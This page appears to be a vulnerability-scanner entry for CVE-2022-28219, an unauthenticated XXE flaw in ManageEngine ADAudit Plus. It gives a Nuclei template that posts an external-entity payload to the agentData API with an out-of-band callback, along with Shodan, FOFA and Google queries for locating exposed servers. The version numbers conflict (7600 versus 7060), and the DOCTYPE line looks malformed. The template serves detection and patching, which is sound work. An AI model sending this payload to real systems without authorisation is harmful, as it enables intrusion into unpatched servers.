CVE-2022-28219: Zoho ManageEngine ADAudit Plus <7600 - XML Entity Injection/Remote Code Execution

2025-08-01 Zoho ManageEngine ADAudit Plus PoC Public

Description

Zoho ManageEngine ADAudit Plus before version 7060 is vulnerable to an

unauthenticated XML entity injection attack that can lead to remote code execution.

PoC

id: CVE-2022-28219

info:
  name: Zoho ManageEngine ADAudit Plus <7600 - XML Entity Injection/Remote Code Execution
  author: dwisiswant0
  severity: critical
  description: |
    Zoho ManageEngine ADAudit Plus before version 7060 is vulnerable to an
    unauthenticated XML entity injection attack that can lead to remote code execution.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code or perform remote code execution on the affected system.
  remediation: |
    Update to ADAudit Plus build 7060 or later, and ensure ADAudit Plus
    is configured with a dedicated service account with restricted privileges.
  reference:
    - https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html
    - https://www.horizon3.ai/red-team-blog-cve-2022-28219/
    - https://manageengine.com
    - https://nvd.nist.gov/vuln/detail/CVE-2022-28219
    - http://cewolf.sourceforge.net/new/index.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-28219
    cwe-id: CWE-611
    epss-score: 0.97193
    epss-percentile: 0.9989
    cpe: cpe:2.3:a:zohocorp:manageengine_adaudit_plus:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: zohocorp
    product: manageengine_adaudit_plus
    shodan-query:
      - http.title:"ADAudit Plus" || http.title:"ManageEngine - ADManager Plus"
      - http.title:"adaudit plus" || http.title:"manageengine - admanager plus"
    fofa-query: title="adaudit plus" || http.title:"manageengine - admanager plus"
    google-query: intitle:"adaudit plus" || http.title:"manageengine - admanager plus"
  tags: cve,cve2022,xxe,rce,zoho,manageengine,unauth,zohocorp,vkev,vuln

http:
  - method: POST
    path:
      - "{{BaseURL}}/api/agent/tabs/agentData"

    body: |
      [
        {
          "DomainName": "{{Host}}",
          "EventCode": 4688,
          "EventType": 0,
          "TimeGenerated": 0,
          "Task Content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?><! foo [ <!ENTITY % xxe SYSTEM \"http://{{interactsh-url}}\"> %xxe; ]>"
        }
      ]

    headers:
      Content-Type: application/json

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

      - type: word
        part: body
        words:
          - "ManageEngine"
# digest: 490a0046304402207829dd646144bd28700e6ca31fef3f02e164b261eb6dee05354c33ed7cbc5a9302205755143fed19d91e90ff43683f5183aa1707c4d50a4bfef45071d36eee46a770:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities